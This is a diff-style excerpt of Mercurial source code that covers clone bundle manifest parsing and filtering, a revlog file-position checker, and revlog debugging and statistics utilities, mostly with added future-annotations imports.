341 343 contentopts = _bundlespeccontentopts.get(version, {}).copy()
342 344 if version == b"streamv2" or version == b"streamv3-exp":
343 345 # streamv2 have been reported as "v2" for a while.
344 346 version = b"v2"
345 347
346 348 engine = util.compengines.forbundlename(compression)
347 349 compression, wirecompression = engine.bundletype()
348 350 wireversion = _bundlespeccontentopts[version][b'cg.version']
349 351
350 352 return bundlespec(
351 353 compression, wirecompression, version, wireversion, params, contentopts
352 354 )
353 355
354 356
355 357 def parseclonebundlesmanifest(repo, s):
356 358 """Parses the raw text of a clone bundles manifest.
357 359
358 360 Returns a list of dicts. The dicts have a ``URL`` key corresponding
359 361 to the URL and other keys are the attributes for the entry.
360 362 """
361 363 m = []
362 364 for line in s.splitlines():
363 365 fields = line.split()
364 366 if not fields:
365 367 continue
366 368 attrs = {b'URL': fields[0]}
367 369 for rawattr in fields[1:]:
368 370 key, value = rawattr.split(b'=', 1)
369 371 key = util.urlreq.unquote(key)
370 372 value = util.urlreq.unquote(value)
371 373 attrs[key] = value
372 374
373 375 # Parse BUNDLESPEC into components. This makes client-side
374 376 # preferences easier to specify since you can prefer a single
375 377 # component of the BUNDLESPEC.
376 378 if key == b'BUNDLESPEC':
377 379 try:
378 380 bundlespec = parsebundlespec(repo, value)
379 381 attrs[b'COMPRESSION'] = bundlespec.compression
380 382 attrs[b'VERSION'] = bundlespec.version
381 383 except error.InvalidBundleSpecification:
382 384 pass
383 385 except error.UnsupportedBundleSpecification:
384 386 pass
385 387
386 388 m.append(attrs)
387 389
388 390 return m
389 391
390 392
391 393 def isstreamclonespec(bundlespec):
392 394 # Stream clone v1
393 395 if bundlespec.wirecompression == b'UN' and bundlespec.wireversion == b's1':
394 396 return True
395 397
396 398 # Stream clone v2
397 399 if (
398 400 bundlespec.wirecompression == b'UN'
399 401 and bundlespec.wireversion == b'02'
400 402 and bundlespec.contentopts.get(b'stream', None) in (b"v2", b"v3-exp")
401 403 ):
402 404 return True
403 405
404 406 return False
405 407
406 408
407 409 def filterclonebundleentries(
408 410 repo, entries, streamclonerequested=False, pullbundles=False
409 411 ):
410 412 """Remove incompatible clone bundle manifest entries.
411 413
412 414 Accepts a list of entries parsed with ``parseclonebundlesmanifest``
413 415 and returns a new list consisting of only the entries that this client
414 416 should be able to apply.
415 417
416 418 There is no guarantee we'll be able to apply all returned entries because
417 419 the metadata we use to filter on may be missing or wrong.
418 420 """
419 421 newentries = []
420 422 for entry in entries:
421 423 url = entry.get(b'URL')
422 424 if not pullbundles and not any(
423 425 [url.startswith(scheme) for scheme in SUPPORTED_CLONEBUNDLE_SCHEMES]
424 426 ):
425 427 repo.ui.debug(
426 428 b'filtering %s because not a supported clonebundle scheme\n'
427 429 % url
428 430 )
429 431 continue
430 432
431 433 spec = entry.get(b'BUNDLESPEC')
432 434 if spec:
433 435 try:
434 436 bundlespec = parsebundlespec(repo, spec, strict=True)
435 437
436 438 # If a stream clone was requested, filter out non-streamclone
437 439 # entries.
438 440 if streamclonerequested and not isstreamclonespec(bundlespec):
439 441 repo.ui.debug(
440 442 b'filtering %s because not a stream clone\n' % url
441 443 )
442 444 continue
443 445
444 446 except error.InvalidBundleSpecification as e:
445 447 repo.ui.debug(stringutil.forcebytestr(e) + b'\n')
446 448 continue
447 449 except error.UnsupportedBundleSpecification as e:
448 450 repo.ui.debug(
449 451 b'filtering %s because unsupported bundle '
450 452 b'spec: %s\n' % (url, stringutil.forcebytestr(e))
451 453 )
452 454 continue
453 455 # If we don't have a spec and requested a stream clone, we don't know
454 456 # what the entry is so don't attempt to apply it.
455 457 elif streamclonerequested:
456 458 repo.ui.debug(
457 459 b'filtering %s because cannot determine if a stream '
458 460 b'clone bundle\n' % url
459 461 )
460 462 continue
461 463
462 464 if b'REQUIRESNI' in entry and not sslutil.hassni:
463 465 repo.ui.debug(b'filtering %s because SNI not supported\n' % url)
464 466 continue
465 467
466 468 if b'REQUIREDRAM' in entry:
467 469 try:
468 470 requiredram = util.sizetoint(entry[b'REQUIREDRAM'])
469 471 except error.ParseError:
470 472 repo.ui.debug(
471 473 b'filtering %s due to a bad REQUIREDRAM attribute\n' % url
472 474 )
473 475 continue
474 476 actualram = repo.ui.estimatememory()
475 477 if actualram is not None and actualram * 0.66 < requiredram:
476 478 repo.ui.debug(
477 479 b'filtering %s as it needs more than 2/3 of system memory\n'
478 480 % url
479 481 )
480 482 continue
481 483
482 484 newentries.append(entry)
483 485
484 486 return newentries
485 487
486 488
487 489 class clonebundleentry:
488 490 """Represents an item in a clone bundles manifest.
489 491
490 492 This rich class is needed to support sorting since sorted() in Python 3
491 493 doesn't support ``cmp`` and our comparison is complex enough that ``key=``
492 494 won't work.
493 495 """
494 496
495 497 def __init__(self, value, prefers):
496 498 self.value = value
497 499 self.prefers = prefers
498 500
499 501 def _cmp(self, other):
500 502 for prefkey, prefvalue in self.prefers:
501 503 avalue = self.value.get(prefkey)
502 504 bvalue = other.value.get(prefkey)
503 505
504 506 # Special case for b missing attribute and a matches exactly.
505 507 if avalue is not None and bvalue is None and avalue == prefvalue:
506 508 return -1
507 509
508 510 # Special case for a missing attribute and b matches exactly.
509 511 if bvalue is not None and avalue is None and bvalue == prefvalue:
510 512 return 1
511 513
512 514 # We can't compare unless attribute present on both.
513 515 if avalue is None or bvalue is None:
514 516 continue
515 517
516 518 # Same values should fall back to next attribute.
517 519 if avalue == bvalue:
518 520 continue
519 521
520 522 # Exact matches come first.
521 523 if avalue == prefvalue:
522 524 return -1
523 525 if bvalue == prefvalue:
524 526 return 1
525 527
526 528 # Fall back to next attribute.
527 529 continue
528 530
529 531 # If we got here we couldn't sort by attributes and prefers. Fall
530 532 # back to index order.
531 533 return 0
532 534
533 535 def __lt__(self, other):
534 536 return self._cmp(other) < 0
535 537
536 538 def __gt__(self, other):
537 539 return self._cmp(other) > 0
538 540
539 541 def __eq__(self, other):
540 542 return self._cmp(other) == 0
541 543
542 544 def __le__(self, other):
543 545 return self._cmp(other) <= 0
544 546
545 547 def __ge__(self, other):
546 548 return self._cmp(other) >= 0
547 549
548 550 def __ne__(self, other):
549 551 return self._cmp(other) != 0
550 552
551 553
552 554 def sortclonebundleentries(ui, entries):
553 555 prefers = ui.configlist(b'ui', b'clonebundleprefers')
554 556 if not prefers:
555 557 return list(entries)
556 558
557 559 def _split(p):
558 560 if b'=' not in p:
559 561 hint = _(b"each comma separated item should be key=value pairs")
560 562 raise error.Abort(
561 563 _(b"invalid ui.clonebundleprefers item: %s") % p, hint=hint
562 564 )
563 565 return p.split(b'=', 1)
564 566
565 567 prefers = [_split(p) for p in prefers]
566 568
567 569 items = sorted(clonebundleentry(v, prefers) for v in entries)
568 570 return [i.value for i in items]
@@ -1,38 +1,40
1 from __future__ import annotations
2
1 3 from ..i18n import _
2 4 from .. import error
3 5
4 6
5 7 def get_checker(ui, revlog_name=b'changelog'):
6 8 """Get a function that checks file handle position is as expected.
7 9
8 10 This is used to ensure that files haven't been modified outside of our
9 11 knowledge (such as on a networked filesystem, if `hg debuglocks` was used,
10 12 or writes to .hg that ignored locks happened).
11 13
12 14 Due to revlogs supporting a concept of buffered, delayed, or diverted
13 15 writes, we're allowing the files to be shorter than expected (the data may
14 16 not have been written yet), but they can't be longer.
15 17
16 18 Please note that this check is not perfect; it can't detect all cases (there
17 19 may be false-negatives/false-OKs), but it should never claim there's an
18 20 issue when there isn't (false-positives/false-failures).
19 21 """
20 22
21 23 vpos = ui.config(b'debug', b'revlog.verifyposition.' + revlog_name)
22 24 # Avoid any `fh.tell` cost if this isn't enabled.
23 25 if not vpos or vpos not in [b'log', b'warn', b'fail']:
24 26 return None
25 27
26 28 def _checker(fh, fn, expected):
27 29 if fh.tell() <= expected:
28 30 return
29 31
30 32 msg = _(b'%s: file cursor at position %d, expected %d')
31 33 # Always log if we're going to warn or fail.
32 34 ui.log(b'debug', msg + b'\n', fn, fh.tell(), expected)
33 35 if vpos == b'warn':
34 36 ui.warn((msg + b'\n') % (fn, fh.tell(), expected))
35 37 elif vpos == b'fail':
36 38 raise error.RevlogError(msg % (fn, fh.tell(), expected))
37 39
38 40 return _checker
@@ -1,943 +1,945
1 1 # revlogutils/debug.py - utility used for revlog debuging
2 2 #
3 3 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
4 4 # Copyright 2022 Octobus <contact@octobus.net>
5 5 #
6 6 # This software may be used and distributed according to the terms of the
7 7 # GNU General Public License version 2 or any later version.
8 8
9 from __future__ import annotations
10
9 11 import collections
10 12 import string
11 13
12 14 from .. import (
13 15 mdiff,
14 16 node as nodemod,
15 17 revlogutils,
16 18 )
17 19
18 20 from . import (
19 21 constants,
20 22 deltas as deltautil,
21 23 )
22 24
23 25 INDEX_ENTRY_DEBUG_COLUMN = []
24 26
25 27 NODE_SIZE = object()
26 28
27 29
28 30 class _column_base:
29 31 """constains the definition of a revlog column
30 32
31 33 name: the column header,
32 34 value_func: the function called to get a value,
33 35 size: the width of the column,
34 36 verbose_only: only include the column in verbose mode.
35 37 """
36 38
37 39 def __init__(self, name, value_func, size=None, verbose=False):
38 40 self.name = name
39 41 self.value_func = value_func
40 42 if size is not NODE_SIZE:
41 43 if size is None:
42 44 size = 8 # arbitrary default
43 45 size = max(len(name), size)
44 46 self._size = size
45 47 self.verbose_only = verbose
46 48
47 49 def get_size(self, node_size):
48 50 if self._size is NODE_SIZE:
49 51 return node_size
50 52 else:
51 53 return self._size
52 54
53 55
54 56 def debug_column(name, size=None, verbose=False):
55 57 """decorated function is registered as a column
56 58
57 59 name: the name of the column,
58 60 size: the expected size of the column.
59 61 """
60 62
61 63 def register(func):
62 64 entry = _column_base(
63 65 name=name,
64 66 value_func=func,
65 67 size=size,
66 68 verbose=verbose,
67 69 )
68 70 INDEX_ENTRY_DEBUG_COLUMN.append(entry)
69 71 return entry
70 72
71 73 return register
72 74
73 75
74 76 @debug_column(b"rev", size=6)
75 77 def _rev(index, rev, entry, hexfn):
76 78 return b"%d" % rev
77 79
78 80
79 81 @debug_column(b"rank", size=6, verbose=True)
80 82 def rank(index, rev, entry, hexfn):
81 83 return b"%d" % entry[constants.ENTRY_RANK]
82 84
83 85
84 86 @debug_column(b"linkrev", size=6)
85 87 def _linkrev(index, rev, entry, hexfn):
86 88 return b"%d" % entry[constants.ENTRY_LINK_REV]
87 89
88 90
89 91 @debug_column(b"nodeid", size=NODE_SIZE)
90 92 def _nodeid(index, rev, entry, hexfn):
91 93 return hexfn(entry[constants.ENTRY_NODE_ID])
92 94
93 95
94 96 @debug_column(b"p1-rev", size=6, verbose=True)
95 97 def _p1_rev(index, rev, entry, hexfn):
96 98 return b"%d" % entry[constants.ENTRY_PARENT_1]
97 99
98 100
99 101 @debug_column(b"p1-nodeid", size=NODE_SIZE)
100 102 def _p1_node(index, rev, entry, hexfn):
101 103 parent = entry[constants.ENTRY_PARENT_1]
102 104 p_entry = index[parent]
103 105 return hexfn(p_entry[constants.ENTRY_NODE_ID])
104 106
105 107
106 108 @debug_column(b"p2-rev", size=6, verbose=True)
107 109 def _p2_rev(index, rev, entry, hexfn):
108 110 return b"%d" % entry[constants.ENTRY_PARENT_2]
109 111
110 112
111 113 @debug_column(b"p2-nodeid", size=NODE_SIZE)
112 114 def _p2_node(index, rev, entry, hexfn):
113 115 parent = entry[constants.ENTRY_PARENT_2]
114 116 p_entry = index[parent]
115 117 return hexfn(p_entry[constants.ENTRY_NODE_ID])
116 118
117 119
118 120 @debug_column(b"full-size", size=20, verbose=True)
119 121 def full_size(index, rev, entry, hexfn):
120 122 return b"%d" % entry[constants.ENTRY_DATA_UNCOMPRESSED_LENGTH]
121 123
122 124
123 125 @debug_column(b"delta-base", size=6, verbose=True)
124 126 def delta_base(index, rev, entry, hexfn):
125 127 return b"%d" % entry[constants.ENTRY_DELTA_BASE]
126 128
127 129
128 130 @debug_column(b"flags", size=2, verbose=True)
129 131 def flags(index, rev, entry, hexfn):
130 132 field = entry[constants.ENTRY_DATA_OFFSET]
131 133 field &= 0xFFFF
132 134 return b"%d" % field
133 135
134 136
135 137 @debug_column(b"comp-mode", size=4, verbose=True)
136 138 def compression_mode(index, rev, entry, hexfn):
137 139 return b"%d" % entry[constants.ENTRY_DATA_COMPRESSION_MODE]
138 140
139 141
140 142 @debug_column(b"data-offset", size=20, verbose=True)
141 143 def data_offset(index, rev, entry, hexfn):
142 144 field = entry[constants.ENTRY_DATA_OFFSET]
143 145 field >>= 16
144 146 return b"%d" % field
145 147
146 148
147 149 @debug_column(b"chunk-size", size=10, verbose=True)
148 150 def data_chunk_size(index, rev, entry, hexfn):
149 151 return b"%d" % entry[constants.ENTRY_DATA_COMPRESSED_LENGTH]
150 152
151 153
152 154 @debug_column(b"sd-comp-mode", size=7, verbose=True)
153 155 def sidedata_compression_mode(index, rev, entry, hexfn):
154 156 compression = entry[constants.ENTRY_SIDEDATA_COMPRESSION_MODE]
155 157 if compression == constants.COMP_MODE_PLAIN:
156 158 return b"plain"
157 159 elif compression == constants.COMP_MODE_DEFAULT:
158 160 return b"default"
159 161 elif compression == constants.COMP_MODE_INLINE:
160 162 return b"inline"
161 163 else:
162 164 return b"%d" % compression
163 165
164 166
165 167 @debug_column(b"sidedata-offset", size=20, verbose=True)
166 168 def sidedata_offset(index, rev, entry, hexfn):
167 169 return b"%d" % entry[constants.ENTRY_SIDEDATA_OFFSET]
168 170
169 171
170 172 @debug_column(b"sd-chunk-size", size=10, verbose=True)
171 173 def sidedata_chunk_size(index, rev, entry, hexfn):
172 174 return b"%d" % entry[constants.ENTRY_SIDEDATA_COMPRESSED_LENGTH]
173 175
174 176
175 177 def debug_index(
176 178 ui,
177 179 repo,
178 180 formatter,
179 181 revlog,
180 182 full_node,
181 183 ):
182 184 """display index data for a revlog"""
183 185 if full_node:
184 186 hexfn = nodemod.hex
185 187 else:
186 188 hexfn = nodemod.short
187 189
188 190 idlen = 12
189 191 for i in revlog:
190 192 idlen = len(hexfn(revlog.node(i)))
191 193 break
192 194
193 195 fm = formatter
194 196
195 197 header_pieces = []
196 198 for column in INDEX_ENTRY_DEBUG_COLUMN:
197 199 if column.verbose_only and not ui.verbose:
198 200 continue
199 201 size = column.get_size(idlen)
200 202 name = column.name
201 203 header_pieces.append(name.rjust(size))
202 204
203 205 fm.plain(b' '.join(header_pieces) + b'\n')
204 206
205 207 index = revlog.index
206 208
207 209 for rev in revlog:
208 210 fm.startitem()
209 211 entry = index[rev]
210 212 first = True
211 213 for column in INDEX_ENTRY_DEBUG_COLUMN:
212 214 if column.verbose_only and not ui.verbose:
213 215 continue
214 216 if not first:
215 217 fm.plain(b' ')
216 218 first = False
217 219
218 220 size = column.get_size(idlen)
219 221 value = column.value_func(index, rev, entry, hexfn)
220 222 display = b"%%%ds" % size
221 223 fm.write(column.name, display, value)
222 224 fm.plain(b'\n')
223 225
224 226 fm.end()
225 227
226 228
227 229 def dump(ui, revlog):
228 230 """perform the work for `hg debugrevlog --dump"""
229 231 # XXX seems redundant with debug index ?
230 232 r = revlog
231 233 numrevs = len(r)
232 234 ui.write(
233 235 (
234 236 b"# rev p1rev p2rev start end deltastart base p1 p2"
235 237 b" rawsize totalsize compression heads chainlen\n"
236 238 )
237 239 )
238 240 ts = 0
239 241 heads = set()
240 242
241 243 for rev in range(numrevs):
242 244 dbase = r.deltaparent(rev)
243 245 if dbase == -1:
244 246 dbase = rev
245 247 cbase = r.chainbase(rev)
246 248 clen = r.chainlen(rev)
247 249 p1, p2 = r.parentrevs(rev)
248 250 rs = r.rawsize(rev)
249 251 ts = ts + rs
250 252 heads -= set(r.parentrevs(rev))
251 253 heads.add(rev)
252 254 try:
253 255 compression = ts / r.end(rev)
254 256 except ZeroDivisionError:
255 257 compression = 0
256 258 ui.write(
257 259 b"%5d %5d %5d %5d %5d %10d %4d %4d %4d %7d %9d "
258 260 b"%11d %5d %8d\n"
259 261 % (
260 262 rev,
261 263 p1,
262 264 p2,
263 265 r.start(rev),
264 266 r.end(rev),
265 267 r.start(dbase),
266 268 r.start(cbase),
267 269 r.start(p1),
268 270 r.start(p2),
269 271 rs,
270 272 ts,
271 273 compression,
272 274 len(heads),
273 275 clen,
274 276 )
275 277 )
276 278
277 279
278 280 def debug_revlog(ui, revlog):
279 281 """code for `hg debugrevlog`"""
280 282 r = revlog
281 283 format = r._format_version
282 284 v = r._format_flags
283 285 flags = []
284 286 gdelta = False
285 287 if v & constants.FLAG_INLINE_DATA:
286 288 flags.append(b'inline')
287 289 if v & constants.FLAG_GENERALDELTA:
288 290 gdelta = True
289 291 flags.append(b'generaldelta')
290 292 if not flags:
291 293 flags = [b'(none)']
292 294
293 295 ### the total size of stored content if incompressed.
294 296 full_text_total_size = 0
295 297 ### tracks merge vs single parent
296 298 nummerges = 0
297 299
298 300 ### tracks ways the "delta" are build
299 301 # nodelta
300 302 numempty = 0
301 303 numemptytext = 0
302 304 numemptydelta = 0
303 305 # full file content
304 306 numfull = 0
305 307 # intermediate snapshot against a prior snapshot
306 308 numsemi = 0
307 309 # snapshot count per depth
308 310 numsnapdepth = collections.defaultdict(lambda: 0)
309 311 # number of snapshots with a non-ancestor delta
310 312 numsnapdepth_nad = collections.defaultdict(lambda: 0)
311 313 # delta against previous revision
312 314 numprev = 0
313 315 # delta against prev, where prev is a non-ancestor
314 316 numprev_nad = 0
315 317 # delta against first or second parent (not prev)
316 318 nump1 = 0
317 319 nump2 = 0
318 320 # delta against neither prev nor parents
319 321 numother = 0
320 322 # delta against other that is a non-ancestor
321 323 numother_nad = 0
322 324 # delta against prev that are also first or second parent
323 325 # (details of `numprev`)
324 326 nump1prev = 0
325 327 nump2prev = 0
326 328
327 329 # data about delta chain of each revs
328 330 chainlengths = []
329 331 chainbases = []
330 332 chainspans = []
331 333
332 334 # data about each revision
333 335 datasize = [None, 0, 0]
334 336 fullsize = [None, 0, 0]
335 337 semisize = [None, 0, 0]
336 338 # snapshot count per depth
337 339 snapsizedepth = collections.defaultdict(lambda: [None, 0, 0])
338 340 deltasize = [None, 0, 0]
339 341 chunktypecounts = {}
340 342 chunktypesizes = {}
341 343
342 344 def addsize(size, l):
343 345 if l[0] is None or size < l[0]:
344 346 l[0] = size
345 347 if size > l[1]:
346 348 l[1] = size
347 349 l[2] += size
348 350
349 351 with r.reading():
350 352 numrevs = len(r)
351 353 for rev in range(numrevs):
352 354 p1, p2 = r.parentrevs(rev)
353 355 delta = r.deltaparent(rev)
354 356 if format > 0:
355 357 s = r.rawsize(rev)
356 358 full_text_total_size += s
357 359 addsize(s, datasize)
358 360 if p2 != nodemod.nullrev:
359 361 nummerges += 1
360 362 size = r.length(rev)
361 363 if delta == nodemod.nullrev:
362 364 chainlengths.append(0)
363 365 chainbases.append(r.start(rev))
364 366 chainspans.append(size)
365 367 if size == 0:
366 368 numempty += 1
367 369 numemptytext += 1
368 370 else:
369 371 numfull += 1
370 372 numsnapdepth[0] += 1
371 373 addsize(size, fullsize)
372 374 addsize(size, snapsizedepth[0])
373 375 else:
374 376 nad = (
375 377 delta != p1
376 378 and delta != p2
377 379 and not r.isancestorrev(delta, rev)
378 380 )
379 381 chainlengths.append(chainlengths[delta] + 1)
380 382 baseaddr = chainbases[delta]
381 383 revaddr = r.start(rev)
382 384 chainbases.append(baseaddr)
383 385 chainspans.append((revaddr - baseaddr) + size)
384 386 if size == 0:
385 387 numempty += 1
386 388 numemptydelta += 1
387 389 elif r.issnapshot(rev):
388 390 addsize(size, semisize)
389 391 numsemi += 1
390 392 depth = r.snapshotdepth(rev)
391 393 numsnapdepth[depth] += 1
392 394 if nad:
393 395 numsnapdepth_nad[depth] += 1
394 396 addsize(size, snapsizedepth[depth])
395 397 else:
396 398 addsize(size, deltasize)
397 399 if delta == rev - 1:
398 400 numprev += 1
399 401 if delta == p1:
400 402 nump1prev += 1
401 403 elif delta == p2:
402 404 nump2prev += 1
403 405 elif nad:
404 406 numprev_nad += 1
405 407 elif delta == p1:
406 408 nump1 += 1
407 409 elif delta == p2:
408 410 nump2 += 1
409 411 elif delta != nodemod.nullrev:
410 412 numother += 1
411 413 numother_nad += 1
412 414
413 415 # Obtain data on the raw chunks in the revlog.
414 416 if hasattr(r, '_inner'):
415 417 segment = r._inner.get_segment_for_revs(rev, rev)[1]
416 418 else:
417 419 segment = r._revlog._getsegmentforrevs(rev, rev)[1]
418 420 if segment:
419 421 chunktype = bytes(segment[0:1])
420 422 else:
421 423 chunktype = b'empty'
422 424
423 425 if chunktype not in chunktypecounts:
424 426 chunktypecounts[chunktype] = 0
425 427 chunktypesizes[chunktype] = 0
426 428
427 429 chunktypecounts[chunktype] += 1
428 430 chunktypesizes[chunktype] += size
429 431
430 432 # Adjust size min value for empty cases
431 433 for size in (datasize, fullsize, semisize, deltasize):
432 434 if size[0] is None:
433 435 size[0] = 0
434 436
435 437 numdeltas = numrevs - numfull - numempty - numsemi
436 438 numoprev = numprev - nump1prev - nump2prev - numprev_nad
437 439 num_other_ancestors = numother - numother_nad
438 440 totalrawsize = datasize[2]
439 441 datasize[2] /= numrevs
440 442 fulltotal = fullsize[2]
441 443 if numfull == 0:
442 444 fullsize[2] = 0
443 445 else:
444 446 fullsize[2] /= numfull
445 447 semitotal = semisize[2]
446 448 snaptotal = {}
447 449 if numsemi > 0:
448 450 semisize[2] /= numsemi
449 451 for depth in snapsizedepth:
450 452 snaptotal[depth] = snapsizedepth[depth][2]
451 453 snapsizedepth[depth][2] /= numsnapdepth[depth]
452 454
453 455 deltatotal = deltasize[2]
454 456 if numdeltas > 0:
455 457 deltasize[2] /= numdeltas
456 458 totalsize = fulltotal + semitotal + deltatotal
457 459 avgchainlen = sum(chainlengths) / numrevs
458 460 maxchainlen = max(chainlengths)
459 461 maxchainspan = max(chainspans)
460 462 compratio = 1
461 463 if totalsize:
462 464 compratio = totalrawsize / totalsize
463 465
464 466 basedfmtstr = b'%%%dd\n'
465 467 basepcfmtstr = b'%%%dd %s(%%5.2f%%%%)\n'
466 468
467 469 def dfmtstr(max):
468 470 return basedfmtstr % len(str(max))
469 471
470 472 def pcfmtstr(max, padding=0):
471 473 return basepcfmtstr % (len(str(max)), b' ' * padding)
472 474
473 475 def pcfmt(value, total):
474 476 if total:
475 477 return (value, 100 * float(value) / total)
476 478 else:
477 479 return value, 100.0
478 480
479 481 ui.writenoi18n(b'format : %d\n' % format)
480 482 ui.writenoi18n(b'flags : %s\n' % b', '.join(flags))
481 483
482 484 ui.write(b'\n')
483 485 fmt = pcfmtstr(totalsize)
484 486 fmt2 = dfmtstr(totalsize)
485 487 ui.writenoi18n(b'revisions : ' + fmt2 % numrevs)
486 488 ui.writenoi18n(b' merges : ' + fmt % pcfmt(nummerges, numrevs))
487 489 ui.writenoi18n(
488 490 b' normal : ' + fmt % pcfmt(numrevs - nummerges, numrevs)
489 491 )
490 492 ui.writenoi18n(b'revisions : ' + fmt2 % numrevs)
491 493 ui.writenoi18n(b' empty : ' + fmt % pcfmt(numempty, numrevs))
492 494 ui.writenoi18n(
493 495 b' text : '
494 496 + fmt % pcfmt(numemptytext, numemptytext + numemptydelta)
495 497 )
496 498 ui.writenoi18n(
497 499 b' delta : '
498 500 + fmt % pcfmt(numemptydelta, numemptytext + numemptydelta)
499 501 )
500 502 ui.writenoi18n(
501 503 b' snapshot : ' + fmt % pcfmt(numfull + numsemi, numrevs)
502 504 )
503 505 for depth in sorted(numsnapdepth):
504 506 base = b' lvl-%-3d : ' % depth
505 507 count = fmt % pcfmt(numsnapdepth[depth], numrevs)
506 508 pieces = [base, count]
507 509 if numsnapdepth_nad[depth]:
508 510 pieces[-1] = count = count[:-1] # drop the final '\n'
509 511 more = b' non-ancestor-bases: '
510 512 anc_count = fmt
511 513 anc_count %= pcfmt(numsnapdepth_nad[depth], numsnapdepth[depth])
512 514 pieces.append(more)
513 515 pieces.append(anc_count)
514 516 ui.write(b''.join(pieces))
515 517 ui.writenoi18n(b' deltas : ' + fmt % pcfmt(numdeltas, numrevs))
516 518 ui.writenoi18n(b'revision size : ' + fmt2 % totalsize)
517 519 ui.writenoi18n(
518 520 b' snapshot : ' + fmt % pcfmt(fulltotal + semitotal, totalsize)
519 521 )
520 522 for depth in sorted(numsnapdepth):
521 523 ui.write(
522 524 (b' lvl-%-3d : ' % depth)
523 525 + fmt % pcfmt(snaptotal[depth], totalsize)
524 526 )
525 527 ui.writenoi18n(b' deltas : ' + fmt % pcfmt(deltatotal, totalsize))
526 528
527 529 letters = string.ascii_letters.encode('ascii')
528 530
529 531 def fmtchunktype(chunktype):
530 532 if chunktype == b'empty':
531 533 return b' %s : ' % chunktype
532 534 elif chunktype in letters:
533 535 return b' 0x%s (%s) : ' % (nodemod.hex(chunktype), chunktype)
534 536 else:
535 537 return b' 0x%s : ' % nodemod.hex(chunktype)
536 538
537 539 ui.write(b'\n')
538 540 ui.writenoi18n(b'chunks : ' + fmt2 % numrevs)
539 541 for chunktype in sorted(chunktypecounts):
540 542 ui.write(fmtchunktype(chunktype))
541 543 ui.write(fmt % pcfmt(chunktypecounts[chunktype], numrevs))
542 544 ui.writenoi18n(b'chunks size : ' + fmt2 % totalsize)
543 545 for chunktype in sorted(chunktypecounts):
544 546 ui.write(fmtchunktype(chunktype))
545 547 ui.write(fmt % pcfmt(chunktypesizes[chunktype], totalsize))
546 548
547 549 ui.write(b'\n')
548 550 b_total = b"%d" % full_text_total_size
549 551 p_total = []
550 552 while len(b_total) > 3:
551 553 p_total.append(b_total[-3:])
552 554 b_total = b_total[:-3]
553 555 p_total.append(b_total)
554 556 p_total.reverse()
555 557 b_total = b' '.join(p_total)
556 558
557 559 ui.write(b'\n')
558 560 ui.writenoi18n(b'total-stored-content: %s bytes\n' % b_total)
559 561 ui.write(b'\n')
560 562 fmt = dfmtstr(max(avgchainlen, maxchainlen, maxchainspan, compratio))
561 563 ui.writenoi18n(b'avg chain length : ' + fmt % avgchainlen)
562 564 ui.writenoi18n(b'max chain length : ' + fmt % maxchainlen)
563 565 ui.writenoi18n(b'max chain reach : ' + fmt % maxchainspan)
564 566 ui.writenoi18n(b'compression ratio : ' + fmt % compratio)
565 567
566 568 if format > 0:
567 569 ui.write(b'\n')
568 570 ui.writenoi18n(
569 571 b'uncompressed data size (min/max/avg) : %d / %d / %d\n'
570 572 % tuple(datasize)
571 573 )
572 574 ui.writenoi18n(
573 575 b'full revision size (min/max/avg) : %d / %d / %d\n'
574 576 % tuple(fullsize)
575 577 )
576 578 ui.writenoi18n(
577 579 b'inter-snapshot size (min/max/avg) : %d / %d / %d\n'
578 580 % tuple(semisize)
579 581 )
580 582 for depth in sorted(snapsizedepth):
581 583 if depth == 0:
582 584 continue
583 585 ui.writenoi18n(
584 586 b' level-%-3d (min/max/avg) : %d / %d / %d\n'
585 587 % ((depth,) + tuple(snapsizedepth[depth]))
586 588 )
587 589 ui.writenoi18n(
588 590 b'delta size (min/max/avg) : %d / %d / %d\n'
589 591 % tuple(deltasize)
590 592 )
591 593
592 594 if numdeltas > 0:
593 595 ui.write(b'\n')
594 596 fmt = pcfmtstr(numdeltas)
595 597 fmt2 = pcfmtstr(numdeltas, 4)
596 598 ui.writenoi18n(
597 599 b'deltas against prev : ' + fmt % pcfmt(numprev, numdeltas)
598 600 )
599 601 if numprev > 0:
600 602 ui.writenoi18n(
601 603 b' where prev = p1 : ' + fmt2 % pcfmt(nump1prev, numprev)
602 604 )
603 605 ui.writenoi18n(
604 606 b' where prev = p2 : ' + fmt2 % pcfmt(nump2prev, numprev)
605 607 )
606 608 ui.writenoi18n(
607 609 b' other-ancestor : ' + fmt2 % pcfmt(numoprev, numprev)
608 610 )
609 611 ui.writenoi18n(
610 612 b' unrelated : ' + fmt2 % pcfmt(numoprev, numprev)
611 613 )
612 614 if gdelta:
613 615 ui.writenoi18n(
614 616 b'deltas against p1 : ' + fmt % pcfmt(nump1, numdeltas)
615 617 )
616 618 ui.writenoi18n(
617 619 b'deltas against p2 : ' + fmt % pcfmt(nump2, numdeltas)
618 620 )
619 621 ui.writenoi18n(
620 622 b'deltas against ancs : '
621 623 + fmt % pcfmt(num_other_ancestors, numdeltas)
622 624 )
623 625 ui.writenoi18n(
624 626 b'deltas against other : '
625 627 + fmt % pcfmt(numother_nad, numdeltas)
626 628 )
627 629
628 630
629 631 def debug_delta_find(ui, revlog, rev, base_rev=nodemod.nullrev):
630 632 """display the search process for a delta"""
631 633 deltacomputer = deltautil.deltacomputer(
632 634 revlog,
633 635 write_debug=ui.write,
634 636 debug_search=not ui.quiet,
635 637 )
636 638
637 639 node = revlog.node(rev)
638 640 p1r, p2r = revlog.parentrevs(rev)
639 641 p1 = revlog.node(p1r)
640 642 p2 = revlog.node(p2r)
641 643 full_text = revlog.revision(rev)
642 644 btext = [full_text]
643 645 textlen = len(btext[0])
644 646 cachedelta = None
645 647 flags = revlog.flags(rev)
646 648
647 649 if base_rev != nodemod.nullrev:
648 650 base_text = revlog.revision(base_rev)
649 651 delta = mdiff.textdiff(base_text, full_text)
650 652
651 653 cachedelta = (base_rev, delta, constants.DELTA_BASE_REUSE_TRY)
652 654 btext = [None]
653 655
654 656 revinfo = revlogutils.revisioninfo(
655 657 node,
656 658 p1,
657 659 p2,
658 660 btext,
659 661 textlen,
660 662 cachedelta,
661 663 flags,
662 664 )
663 665
664 666 fh = revlog._datafp()
665 667 deltacomputer.finddeltainfo(revinfo, fh, target_rev=rev)
666 668
667 669
668 670 def debug_revlog_stats(
669 671 repo, fm, changelog: bool, manifest: bool, filelogs: bool
670 672 ):
671 673 """Format revlog statistics for debugging purposes
672 674
673 675 fm: the output formatter.
674 676 """
675 677 fm.plain(b'rev-count data-size inl type target \n')
676 678
677 679 revlog_entries = [e for e in repo.store.walk() if e.is_revlog]
678 680 revlog_entries.sort(key=lambda e: (e.revlog_type, e.target_id))
679 681
